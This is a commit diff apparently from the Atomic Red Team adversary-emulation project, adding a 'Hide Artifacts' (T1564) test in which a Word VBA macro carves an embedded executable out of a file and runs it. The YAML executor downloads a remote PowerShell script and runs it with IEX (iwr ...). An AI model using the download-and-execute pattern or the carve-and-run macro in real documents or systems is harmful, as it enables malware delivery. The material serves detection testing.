Extractbinary (#1332)

* initial

* moving file

* hard-code to winword process

Co-authored-by: avocado <avocados@smuggler.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

atomics/T1564/T1564.yaml

@@ -0,0 +1,40 @@
+attack_technique: T1564
+display_name: "Hide Artifacts"
+atomic_tests:
+- name: Extract binary files via VBA
+  auto_generated_guid: 
+  description: |
+    This module extracts a binary (calc.exe) from inside of another binary. 
+    
+    In the wild maldoc authors will use this technique to hide binaries inside of files stored 
+    within the office document itself. An example of this technique can be seen in sample
+
+    f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226
+
+    This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2
+    is the same document without all the malicious code. Document 1 will copy Document 2 to the file system
+    and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this
+    oleObject.bin file is a payload that is parsed out and executed on the file system.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Microsoft Word must be installed
+    prereq_command: |
+      try {
+        New-Object -COMObject "Word.Application" | Out-Null
+        Stop-Process -Name "winword"
+        exit 0
+      } catch { exit 1 }
+    get_prereq_command: |
+      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
+  executor:
+    command: |
+      $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
+      $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+      Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
+    cleanup_command: |
+      Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
+    name: powershell

atomics/T1564/src/T1564-macrocode.txt

@@ -0,0 +1,46 @@
+Sub Extract()
+
+    Dim peBin%
+    Dim byt As Byte
+    Dim memArray() As Variant
+    
+    peBin = FreeFile
+    FName = "aREPLACEMEa"
+    outName = Environ$("TEMP") + "\extracted.exe"
+    Open FName For Binary Access Read As peBin
+
+    cnt = 0
+    
+    Do While Not EOF(peBin)
+        Get peBin, , byt
+        If Hex(byt) = "4D" Then
+            ReDim Preserve memArray(cnt)
+            memArray(cnt) = Hex(byt)
+            cnt = cnt + 1
+            Get peBin, , byt
+            If Hex(byt) = "5A" Then
+                ReDim Preserve memArray(cnt)
+                memArray(cnt) = Hex(byt)
+                cnt = cnt + 1
+                Get peBin, , byt
+                Do While Not EOF(peBin)
+                    ReDim Preserve memArray(cnt)
+                    memArray(cnt) = Hex(byt)
+                    cnt = cnt + 1
+                    Get peBin, , byt
+                Loop
+            End If
+        End If
+    Loop
+    
+    Close peBin
+
+    Open (outName) For Binary Lock Read Write As #1
+    For a = 0 To UBound(memArray)
+        Put #1, , CByte("&h" & memArray(a))
+    Next a
+    Close
+
+    Call Shell(outName, vbNormalFocus)
+
+End Sub